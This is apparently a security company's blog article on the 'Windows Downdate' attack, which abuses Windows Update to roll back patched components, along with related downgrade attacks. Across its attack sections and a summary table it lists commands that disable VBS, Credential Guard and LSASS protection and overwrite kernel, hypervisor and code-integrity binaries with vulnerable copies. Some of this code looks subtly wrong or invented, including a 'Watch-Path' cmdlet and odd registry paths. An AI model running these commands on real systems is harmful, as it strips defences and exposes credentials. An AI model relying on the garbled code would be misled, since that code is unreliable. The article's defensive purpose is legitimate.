Windows Downdate: Downgrade Attacks Using Windows Updates and Beyond

Windows Downdate: Downgrade Attacks Using Windows Updates and Beyond

Read In This Article

The “Windows Downdate” vulnerability, identified and demonstrated by researcher Anon Leviev, is a downgrade attack technique that leverages Windows Update mechanisms to reintroduce older, vulnerable versions of system files. By circumventing normal update verification checks, this attack allows malicious actors to downgrade essential system components like the Windows kernel, Hyper-V hypervisor, and other critical drivers, effectively undoing applied security patches without detection. This type of exploit bypasses endpoint detection and response (EDR) systems and misleads the OS into thinking it’s up-to-date, making it a powerful tool for attackers aiming to exploit known vulnerabilities that have been patched previously.

The attack exploits two key vulnerabilities, CVE-2024-21302 and CVE-2024-38202, targeting the Windows Update stack and allowing privilege escalation by modifying system restore points to execute downgrades. Microsoft has been informed and has issued partial mitigations, but a full patch is still pending. This discovery, presented at Black Hat 2024, underscores a critical challenge in OS security—ensuring that update mechanisms themselves are robust against tampering. As security teams work toward more resilient update infrastructures, they recommend auditing access control, limiting update permissions, and monitoring for downgrade activities to mitigate such risks until a comprehensive fix is available.

Windows Downdate: A Novel Downgrade Attack on Windows

Windows Downdate is a novel attack method that exploits the Windows Update process to downgrade critical operating system components. This attack allows malicious actors to revert fully patched systems to older, vulnerable versions, effectively turning fixed vulnerabilities into zero-days. The attack leverages a flaw in the Windows Update process that grants an attacker full control, bypassing integrity verifications and Trusted Installer enforcement. This control allows the attacker to craft a custom, downgrading action list that replaces target components with older versions. The attack is particularly insidious because it leaves the system appearing fully updated while remaining persistent and irreversible.

The impact of Windows Downdate extends beyond simply re-exposing known vulnerabilities. The researcher demonstrated the ability to bypass security features like Credential Guard, Hypervisor-Protected Code Integrity (HVCI), and even the UEFI lock protecting Virtualization-Based Security (VBS). By downgrading components in the virtualization stack, the attack undermines the security boundaries designed to isolate sensitive operations and protect the kernel. This research highlights the need for increased awareness and mitigation against OS-based downgrade attacks, urging a critical review of design features and assumptions about file immutability. It underscores the importance of thorough examination of in-the-wild attacks like the BlackLotus UEFI Bootkit to understand their broader implications and potential for exploitation in other areas.

This attack, which includes steps like registry manipulation and hijacking of update configuration files, makes detection difficult because Windows Update will continue to report the system as fully patched even when it is not.

1. Setting Up the Downgrade Environment

The attack begins by configuring Windows Update to accept downgraded components. This requires modifying the Pending.xml file, which contains the action list for system updates. The attacker can introduce malicious commands within Pending.xml by setting up a “hardlink” that points from an older, vulnerable version of a component to the target system directory.

Code Example:

<HardlinkFile source="C:\UpdateDir\VulnerableFile.exe" destination="C:\Windows\System32\TargetFile.exe"/>

This command replaces TargetFile.exe with the older, vulnerable VulnerableFile.exe.

2. Registry Manipulation for Trusted Installer Override

By manipulating registry keys, the attacker ensures that the Windows Update process will automatically start and execute the modified Pending.xml file without requiring Trusted Installer privileges. Setting HKLM\COMPONENTS\PendingXmlIdentifier enables the update execution, while HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller enforces auto-start for the Trusted Installer service​

Registry Commands:

reg add "HKLM\COMPONENTS\PendingXmlIdentifier" /t REG_SZ /d C:\Windows\WinSxS\Pending.xml
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TrustedInstaller" /t REG_DWORD /v Start /d 2

then Create Action List

<POQ postAction="reboot">
    <HardlinkFile 
        source="C:\UpdateDir\VulnerableVersion.dll" 
        destination="C:\Windows\System32\Target.dll"/>
</POQ>

2.1 Virtualization-Based Security (VBS) Attacks

VBS creates a secure and isolated virtual environment powered by the Hyper-V hypervisor. In the VBS architecture, Windows runs in two separate modes:

  • Normal Mode (VTL0): Contains the regular Windows kernel and user processes
  • Secure Mode (VTL1): Contains the secure kernel and secure processes

The key security boundaries are:

  • VTL0 → VTL1 transition
  • Ring3/Ring0 → Ring-1 (hypervisor) transition

Credential Guard Attacks

One critical VBS component is Credential Guard, implemented as an Isolated User Mode process (LsaIso.exe) running in Ring3-VTL1. By exploiting vulnerabilities in shared components like KerbClientShared.dll, attackers can cross the VTL0 to VTL1 boundary.

Example attack using downgraded vulnerable version:

# Downgrade KerbClientShared.dll to version 10.0.22000.856
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\KerbClientShared" -Name "ImagePath" -Value "C:\Windows\System32\KerbClientShared.dll.old"

Secure Kernel Exploitation

The Secure Kernel (SecureKernel.exe) runs in Ring0-VTL1 and implements critical security features like HVCI and HyperGuard. Attackers can target vulnerabilities in SecureKernel.exe and its dependencies (SKCI.dll, CI.dll) to gain Ring0-VTL1 access.

Example SecureKernel downgrade:

# Backup current SecureKernel
Copy-Item "C:\Windows\System32\SecureKernel.exe" "C:\Windows\System32\SecureKernel.exe.bak"

# Replace with vulnerable version (10.0.19041.207)
Copy-Item "C:\vulnerable\SecureKernel.exe" "C:\Windows\System32\SecureKernel.exe"

Hypervisor Attacks

The Hyper-V hypervisor (Hvix64.exe/Hvax64.exe) runs in Ring-1 and provides the foundation for VBS isolation. Targeting the hypervisor can completely compromise VBS security boundaries.

Example hypervisor manipulation:

# Disable hypervisor launch
bcdedit /set hypervisorlaunchtype off

# Replace hypervisor binary
Move-Item "C:\Windows\System32\Hvix64.exe" "C:\Windows\System32\Hvix64.exe.bak"
Copy-Item "C:\vulnerable\Hvix64.exe" "C:\Windows\System32\Hvix64.exe"

# Re-enable hypervisor
bcdedit /set hypervisorlaunchtype auto

VBS Remote Disablement

VBS uses UEFI variables for configuration protection. However, this can be bypassed by:

  1. Invalidating critical VBS files
  2. Manipulating the VbsPolicy UEFI variable
  3. Exploiting boot configuration

Example VBS disable commands:

# Disable VBS in registry
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 0 /f

# Clear LSA configuration
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "LsaCfgFlags" /t REG_DWORD /d 0 /f

# Disable Credential Guard
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\CredentialGuard" /v "Enabled" /t REG_DWORD /d 0 /f

Protection Recommendations

To better secure VBS implementations:

  1. Enable VBS with UEFI lock:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 1 /f
  1. Add Mandatory flag:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Mandatory" /t REG_DWORD /d 1 /f
  1. Monitor for VBS configuration changes and file integrity
  2. Implement secure boot with proper revocation lists
  3. Regular security updates for VBS components
  4. Network isolation for critical VBS processes

3. Persisting the Downgrade and Disabling Detection

The downgrade persists by altering poqexec.exe, a non-digitally signed utility that processes the Pending.xml file. By replacing poqexec.exe with a patched version, attackers can loop empty updates, which means Windows will continue to mark the system as “updated.” Additionally, system utilities like SFC.exe (System File Checker) and DISM.exe (Deployment Image Servicing and Management) are also targeted to prevent repair checks from detecting the modifications​.

File Replacement Example:

copy C:\MaliciousTools\poqexec.exe C:\Windows\System32\poqexec.exe

4. Downgrade Example: Reverting to a Vulnerable Kernel

To demonstrate the effectiveness of the downgrade attack, Leviev showcased reverting a kernel component (AFD.sys) to an older, exploitable version. By using similar hardlink techniques and ensuring the downgraded kernel runs on boot, the attack enables privilege escalation through exposed vulnerabilities​.

All Step like this:

  1. Update Process Flow: Shows the stages of Windows Update, from request to execution.
    1. The Windows Update process relies on an update client and an update server, communicating via COM. ● The client operates with Administrator privileges, while the server utilizes Trusted Installer, restricting direct system file modifications, even by Administrators.
    2. The client initiates an update by providing an update folder to the server. The server verifies the integrity of the folder, finalizes update files, and creates an action list (Pending.xml) containing update actions to be performed on reboot. The client only has control over the initial update folder.
    3. The update folder contains update components, each including MUM, manifest, differential, and catalog files. MUM files hold metadata, manifest files contain installation details, differential files act as deltas for base files, and catalog files provide digital signatures.
  2. Registry and Hardlink Configuration: Illustrates how registry keys and Pending.xml configurations interact.
    1. The action list’s path (Pending.xml) is stored in the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Configuration\PoqexecCmdline and is not Trusted Installer enforced. This allows an attacker to modify the actions performed during the update, including creating, deleting, moving, and hard-linking files, as well as manipulating registry keys and values.
    2. A malicious Pending.xml file is created, utilizing the HardlinkFile action to replace target files with older, vulnerable versions. The action list also includes actions to ensure persistence, such as patching the action list parser (PoqExec.exe) to install empty updates, and patching the system integrity check utility (SFC.exe) to prevent detection.
  3. Persistency Setup: Details the replacement of poqexec.exe and prevention of system checks.
    1. The attacker sets the Trusted Installer service to Auto-Start, adds the Pending.xml path and its identifier to the registry. The system then executes the malicious action list during the next reboot, downgrading the target components.
    2. By successfully hijacking the Windows Update process, the attack achieves a persistent, invisible, and undetectable downgrade. The system falsely reports as fully updated, making the downgraded components appear legitimate. The patched PoqExec.exe and SFC.exe prevent future updates and corruption detection, ensuring persistence and irreversibility.

With this attack, an attacker can continually keep the system in a downgraded state, bypassing updates and effectively rendering the term “fully patched” meaningless on affected machines​.

Prevention & Mitigation

Enable VBS with UEFI Lock:

# Enable VBS with UEFI lock
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 1 /f

# Enable Mandatory flag
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Mandatory" /t REG_DWORD /d 1 /f

Long-term Mitigations:

  1. Monitor System File Integrity:
# Run System File Checker
sfc /scannow

# Monitor WinSxS directory
Get-ItemProperty -Path "C:\Windows\WinSxS" -Filter "*.xml" | Watch-Path
  1. Implement Security Controls:
  • Enable Secure Boot
  • Configure UEFI Lock protection
  • Monitor update-related registry keys
  • Deploy endpoint detection and response (EDR) solutions
  1. Regular Security Assessments:
  • Verify system component versions
  • Check for unauthorized modifications
  • Audit update processes

Security Boundaries Affected

Risk Assessment Matrix

  • Severity: Critical
  • Complexity: High
  • Privileges Required: Administrator
  • User Interaction: None
  • Impact: Complete system compromise

CVE Information

  • CVE-2024-21302: Virtualization stack vulnerability
  • CVE-2024-38202: Windows Update manipulation

Let’s go to demonstrating other methods that have exploited rollback vulnerabilities to reinstate old vulnerabilities on patched systems.

1. BlackLotus UEFI Bootkit Downgrade Attack

The BlackLotus UEFI bootkit takes advantage of a downgrade attack on the Secure Boot process. By downgrading the Windows boot manager to an older, vulnerable version, attackers can bypass Secure Boot and disable other OS-level security measures. This attack utilizes a similar principle to Windows Downdate by exploiting rollback functionality to re-enable vulnerabilities.

Commands:

  • Use bcdedit to modify the Boot Configuration Data (BCD) to load an outdated boot manager:
bcdedit /set {bootmgr} path \EFI\Microsoft\Boot\bootmgfw.efi
  • Downgrade boot files by copying a vulnerable bootmgfw.efi to the boot directory:
copy C:\VulnerableFiles\bootmgfw.efi C:\EFI\Microsoft\Boot\bootmgfw.efi

2. Driver Signature Enforcement (DSE) Bypass Downgrade

The “ItsNotASecurityBoundary” DSE bypass uses a False File Immutability (FFI) vulnerability to exploit the fact that the system’s Driver Signature Enforcement feature can be reverted. By downgrading the DSE patch and loading unsigned drivers, attackers can execute malicious rootkits. This attack is relevant to Windows Downdate because it reverts specific components to bypass a security boundary.

Commands:

  • Disable DSE by modifying the ci.dll file:
copy C:\OldVersions\ci.dll C:\Windows\System32\ci.dll
  • Restart the system to enforce changes:
shutdown /r /t 0

3. Kernel Driver Downgrade (AFD.sys)

Similar to the Windows Downdate, downgrading kernel drivers like AFD.sys (Ancillary Function Driver) reintroduces past vulnerabilities that allow for privilege escalation. The attacker can replace the driver with an older version, enabling kernel-mode exploitation.

Hardlink Command Example:

<HardlinkFile source="C:\VulnerableDrivers\AFD.sys" destination="C:\Windows\System32\drivers\AFD.sys"/>

This would be executed within the action list file (Pending.xml) on reboot to apply the vulnerable driver​(REVISED_US24-Leviev-Win…).

4. Virtualization-Based Security (VBS) Disablement

Attackers targeting Virtualization-Based Security (VBS) often aim to downgrade or disable its components (e.g., SecureKernel.exe and Hvix64.exe) by replacing them with unprotected versions. This attack is particularly dangerous on Windows systems that use Credential Guard, as downgrading VBS can expose the system to privilege escalation.

Registry Manipulation:

reg delete HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard /v EnableVirtualizationBasedSecurity
  • Replace SecureKernel.exe with a vulnerable version to disable VBS protections.
copy C:\VulnerableFiles\SecureKernel.exe C:\Windows\System32\SecureKernel.exe

5. Credential Guard Downgrade via Isolated User Mode

Downgrading LsaIso.exe used in Credential Guard disables protections against memory attacks on LSASS. Attackers replace LsaIso.exe with an older version, undermining the isolated user mode and exposing stored credentials.

Code Example:

  • Registry command to modify Credential Guard configurations:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\CredentialGuard" /v Enabled /t REG_DWORD /d 0

Replace LsaIso.exe with an older, vulnerable version:

copy C:\OldVersions\LsaIso.exe C:\Windows\System32\LsaIso.exe

Downgrade Attack Perspective

ComponentAttack SurfaceCommands/CodeNotes
Windows Boot ManagerDowngrade Secure Boot by replacing Boot Manager1. Replace bootmgfw.efi with an older version:
 copy C:\OldFiles\bootmgfw.efi C:\EFI\Microsoft\Boot\bootmgfw.efi
Attack downgrades bootmgfw.efi to bypass Secure Boot; commonly used in BlackLotus attacks
Driver Signature Enforcement (DSE)Re-enable unsigned drivers using old ci.dll1. Copy vulnerable ci.dll:
 copy C:\OldVersions\ci.dll C:\Windows\System32\ci.dll
2. Restart system:
 shutdown /r /t 0
Attack bypasses DSE to load unsigned drivers, often utilized in the “ItsNotASecurityBoundary” DSE bypass attacks
Kernel Driver (AFD.sys)Downgrade kernel driver for privilege escalationUse Hardlink in Pending.xml to downgrade AFD.sys:
 <HardlinkFile source="C:\OldDrivers\AFD.sys" destination="C:\Windows\System32\drivers\AFD.sys"/>
Replacing AFD.sys with an old version allows kernel-mode exploits and privilege escalation attacks
Virtualization-Based Security (VBS)Disable VBS features by downgrading SecureKernel.exe1. Disable VBS in registry:
 reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity
2. Copy old SecureKernel.exe:
 copy C:\OldFiles\SecureKernel.exe C:\Windows\System32\SecureKernel.exe
Attack can disable VBS protections, exposing the system to unauthorized access and elevated privileges
Credential Guard (LsaIso.exe)Downgrade Credential Guard’s isolated user mode process1. Set registry to disable Credential Guard:
 reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\CredentialGuard" /v Enabled /t REG_DWORD /d 0
2. Replace LsaIso.exe:
 copy C:\OldFiles\LsaIso.exe C:\Windows\System32\LsaIso.exe
Downgrading LsaIso.exe compromises Credential Guard, allowing attackers to read sensitive information from LSASS
Windows Update (Pending.xml)Modify Pending.xml to control updates and insert downgradesModify Pending.xml using HardlinkFile action:
 <HardlinkFile source="C:\DowngradeFiles\VulnerableFile.exe" destination="C:\Windows\System32\UpdatedFile.exe"/>
Editing Pending.xml enables downgrades of various system files by replacing them with older, vulnerable versions, used extensively in Windows Downdate attacks
Secure Kernel Code Integrity (SKCI.dll)Downgrade SKCI for code integrity attacksReplace SKCI.dll to disable code integrity checks:
 copy C:\OldFiles\SKCI.dll C:\Windows\System32\SKCI.dll
Downgrading SKCI.dll bypasses code integrity checks under VBS, allowing malicious code to run without detection
Hyper-V HypervisorDowngrade Hyper-V to exploit kernel-mode code executionDowngrade Hyper-V Hypervisor using hardlink:
 <HardlinkFile source="C:\OldFiles\Hvix64.exe" destination="C:\Windows\System32\Hvix64.exe"/>
Replacing Hvix64.exe or Hvax64.exe with older versions allows attacker-controlled code execution within the hypervisor
Windows Kernel (NTOSKRNL.exe)Downgrade NT kernel to expose privilege escalation vulnerabilitiesReplace NT Kernel with vulnerable version:
 copy C:\OldVersions\ntoskrnl.exe C:\Windows\System32\ntoskrnl.exe
Downgrading the Windows Kernel re-introduces old vulnerabilities that facilitate privilege escalation
LSASS Memory ProtectionDisable LSASS protections for credential dumpingDowngrade LSASS protections via registry:
 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 0

Conclusion

The Windows Downdate attack constitutes a significant threat to Windows systems by demonstrating that a “fully patched” system may not provide adequate security. Through manipulating the Windows Update process, the attacker is able to downgrade critical system files, including those responsible for security features like Driver Signature Enforcement and Virtualization-Based Security, despite the presence of digital signatures, integrity checks, and even UEFI locks. The attack exploits the lack of downgrade protection within the Windows Update architecture, thereby making systems susceptible to previously patched vulnerabilities and potentially granting attackers a wide range of privileges, from kernel code execution to control over the hypervisor. This research underscores the necessity for a critical reevaluation of security assumptions related to patching and the need for proactive measures, such as enhanced downgrade protection mechanisms within operating systems, to effectively defend against this class of attacks.

Resources

  • https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/
  • https://www.safebreach.com/blog/update-on-windows-downdate-downgrade-attacks/

Security Researcher

  • Jill Chiu

Free Consultation

For a Free Consultation And Analysis Of Your Business, Please Fill Out The Opposite Form, Our Team Will Contact You As Soon As Possible.